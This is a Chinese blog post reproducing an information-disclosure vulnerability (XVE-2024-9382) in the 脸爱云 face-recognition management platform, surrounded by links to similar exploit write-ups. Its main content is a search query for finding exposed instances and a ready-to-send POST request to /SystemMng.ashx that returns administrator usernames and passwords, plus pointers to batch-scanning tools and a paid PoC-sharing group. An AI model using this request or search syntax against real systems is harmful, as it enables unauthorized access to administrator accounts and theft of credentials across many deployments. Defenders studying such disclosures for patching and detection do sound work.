【漏洞复现】脸爱云一脸通智慧管理平台 SystemMng 管理用户信息泄露漏洞(XVE-2024-9382)

于 2024-06-24 22:26:31 发布
阅读量387 收藏 1
点赞数 11
分类专栏: 漏洞复现篇 文章标签: 信息泄露 脸爱云
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/139940178
版权

0x01 产品简介

脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。
功能包括:系统管理中心、人员信息管理中心、设备管理中心、消费管理子系统、订餐管理子系统、水控管理子系统、电控管理子系统、考勤管理子系统、门禁通道管理子系统、会议签到管理子系统、访客管理子系统。

0x02 漏洞概述

脸爱云一脸通智慧管理平台存在信息泄露漏洞,该漏洞源于SystemMng.ashx接口处存在信息泄露漏洞,攻击者能够利用该漏洞通过SelOperators参数泄露的当前管理员的敏感信息,包括账号密码登录系统后台。

0x03 搜索语法

body="View/UserReserved/UserReservedTest.aspx"

在这里插入图片描述

0x04 漏洞复现

POST /SystemMng.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
 
username=admin&funcName=SelOperators

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

SuperherRo
关注
  • 11
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
脸爱云一脸智慧管理平台 SystemMng 管理用户信息泄露漏洞(XVE-2024-9382)
0xSec
05-01 528
脸爱云一脸智慧管理平台存在信息泄露漏洞,该漏洞源于SystemMng.ashx接口处存在信息泄露漏洞,攻击者能够利用该漏洞过SelOperators参数泄露的当前管理员的敏感信息包括账号密码登录系统后台。
用友NC down/bill SQL注入漏洞复现(XVE-2024-9469)
0xSec
05-01 690
用友NC //portal/pt/erfile/down/bill接口的id参数存在SQL注入漏洞,攻击者过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
用友GRP-U8 sqcxIndex.jsp SQL注入漏洞(XVE-2024-12560)
wan___she__pi的博客
05-28 224
用友GRP-U8是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是行政事业财务领域最专业的政府财务管理软件。
用友NC grouptemplet 任意文件上传漏洞复现(XVE-2024-8857)
0xSec
04-24 460
​用友 NC grouptemplet 接口处存在任意文件上传漏洞,攻击者可过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友NC saveImageServlet 任意文件上传漏洞复现(XVE-2024-7471)
0xSec
04-12 660
​用友 NC saveImageServlet 接口处存在任意文件上传漏洞,攻击者可过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友NC linkVoucher SQL注入漏洞复现(XVE-2024-12622)
0xSec
05-27 732
用友NC /portal/pt/yercommon/linkVoucher 接口存在SQL注入漏洞,攻击者过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 610
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
用友NC registerServlet JNDI 远程代码执行漏洞复现(XVE-2024-10248)
0xSec
05-11 1023
用友NC registerServlet 接口处存在JNDI 远程代码执行漏洞,未经身份验证的远程攻击者可过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友GRP-U8 userInfoWeb SQL注入致RCE漏洞复现 (XVE-2024-10539)
0xSec
05-14 483
用友GRP-U8R10行政事业内控管理软件userInfoWeb接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
超级文件资源管理器X v1.2.1官方版
12-18
为您提供超级文件资源管理器X下载,超级文件资源管理器X是一款多标签页的文件管理工具,支持标签页,让文件管理更简单,更省心,归类显示,AI操作感知,在处理文件时更高效!软件特色 1.支持多标签页 多标签页,让...
XVE提取工具
02-21
XVE提取工具可以帮助用户将一个虚拟机实例从一个平台迁移到另一个平台,或者在不同硬件之间复制虚拟环境,这对于灾难恢复和数据中心管理至关重要。 3. **系统恢复与故障排查**:当虚拟机出现故障时,XVE提取工具...
XVE视频转换器
05-09
其实解除这一限制的方法十分简单,借助一款转换视频格式的小工具XVE的帮助,就可以把XV格式文件里面的视频提取出来,成为加密前的常见格式视频,方便使用其它工具播放或传播。运行XVE的主程序后,点击“浏览”按钮,从弹出...
Nowzen.gaM5xVe
03-18
"Nowzen.gaM5xVe"看起来可能是一个特定项目或文件的命名,但没有足够的上下文来详细解释其含义。不过,我们可以深入探讨HTML的基本概念和关键知识点。 1. **HTML结构**:HTML文档常以`<!DOCTYPE html>`开始,声明...
xv-flv转换器
05-22
【xv-flv转换器】是一款专为视频格式转换设计的工具,主要功能是将.xv格式的视频文件转换成广泛支持的.flv格式。在IT行业中,视频格式转换是一项常见的需求,因为不同的设备和平台可能对视频格式有不同的支持。这款...
集合体系java学习哦
最新发布
07-08
集合体系java学习哦
nignx反向代理配置文件80端口和443端口
07-08
nignx.conf nignx代理配置文件 里面有80端口和443端口代理,443端口含ssl证书配置 并限制非GET|HEAD|POST请求以及请求数据大小上限
Linux操作系统基础知识.docx
07-08
Linux操作系统基础知识.docx
Java软件开发实战 Java基础与案例开发详解 3-6 顺序结构和选择结构 共18页.pdf
07-07
完整版:https://download.csdn.net/download/qq_27595745/89522468 【课程大纲】 1-1 什么是java 1-2 认识java语言 1-3 java平台的体系结构 1-4 java SE环境安装和配置 2-1 java程序简介 2-2 计算机中的程序 2-3 java程序 2-4 java类库组织结构和文档 2-5 java虚拟机简介 2-6 java的垃圾回收器 2-7 java上机练习 3-1 java语言基础入门 3-2 数据的分类 3-3 标识符、关键字和常量 3-4 运算符 3-5 表达式 3-6 顺序结构和选择结构 3-7 循环语句 3-8 跳转语句 3-9 MyEclipse工具介绍 3-10 java基础知识章节练习 4-1 一维数组 4-2 数组应用 4-3 多维数组 4-4 排序算法 4-5 增强for循环 4-6 数组和排序算法章节练习 5-0 抽象和封装 5-1 面向过程的设计思想 5-2 面向对象的设计思想 5-3 抽象 5-4 封装 5-5 属性 5-6 方法的定义 5-7 this关键字 5-8 javaBean 5-9 包 package 5-10 抽象和封装章节练习 6-0 继承和多态 6-1 继承 6-2 object类 6-3 多态 6-4 访问修饰符 6-5 static修饰符 6-6 final修饰符 6-7 abstract修饰符 6-8 接口 6-9 继承和多态 章节练习 7-1 面向对象的分析与设计简介 7-2 对象模型建立 7-3 类之间的关系 7-4 软件的可维护与复用设计原则 7-5 面向对象的设计与分析 章节练习 8-1 内部类与包装器 8-2 对象包装器 8-3 装箱和拆箱 8-4 练习题 9-1 常用类介绍 9-2 StringBuffer和String Builder类 9-3 Rintime类的使用 9-4 日期类简介 9-5 java程序国际化的实现 9-6 Random类和Math类 9-7 枚举 9-8 练习题 10-1 java异常处理 10-2 认识异常 10-3 使用try和catch捕获异常 10-4 使用throw和throws引发异常 10-5 finally关键字 10-6 getMessage和printStackTrace方法 10-7 异常分类 10-8 自定义异常类 10-9 练习题 11-1 Java集合框架和泛型机制 11-2 Collection接口 11-3 Set接口实现类 11-4 List接口实现类 11-5 Map接口 11-6 Collections类 11-7 泛型概述 11-8 练习题 12-1 多线程 12-2 线程的生命周期 12-3 线程的调度和优先级 12-4 线程的同步 12-5 集合类的同步问题 12-6 用Timer类调度任务 12-7 练习题 13-1 Java IO 13-2 Java IO原理 13-3 流类的结构 13-4 文件流 13-5 缓冲流 13-6 转换流 13-7 数据流 13-8 打印流 13-9 对象流 13-10 随机存取文件流 13-11 zip文件流 13-12 练习题 14-1 图形用户界面设计 14-2 事件处理机制 14-3 AWT常用组件 14-4 swing简介 14-5 可视化开发swing组件 14-6 声音的播放和处理 14-7 2D图形的绘制 14-8 练习题 15-1 反射 15-2 使用Java反射机制 15-3 反射与动态代理 15-4 练习题 16-1 Java标注 16-2 JDK内置的基本标注类型 16-3 自定义标注类型 16-4 对标注进行标注 16-5 利用反射获取标注信息 16-6 练习题 17-1 顶目实战1-单机版五子棋游戏 17-2 总体设计 17-3 代码实现 17-4 程序的运行与发布 17-5 手动生成可执行JAR文件 17-6 练习题 18-1 Java数据库编程 18-2 JDBC类和接口 18-3 JDBC操作SQL 18-4 JDBC基本示例 18-5 JDBC应用示例 18-6 练习题 19-1 。。。
搞怪盒子的模型触手辅助.stl
07-08
搞怪盒子的模型触手辅助.stl

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值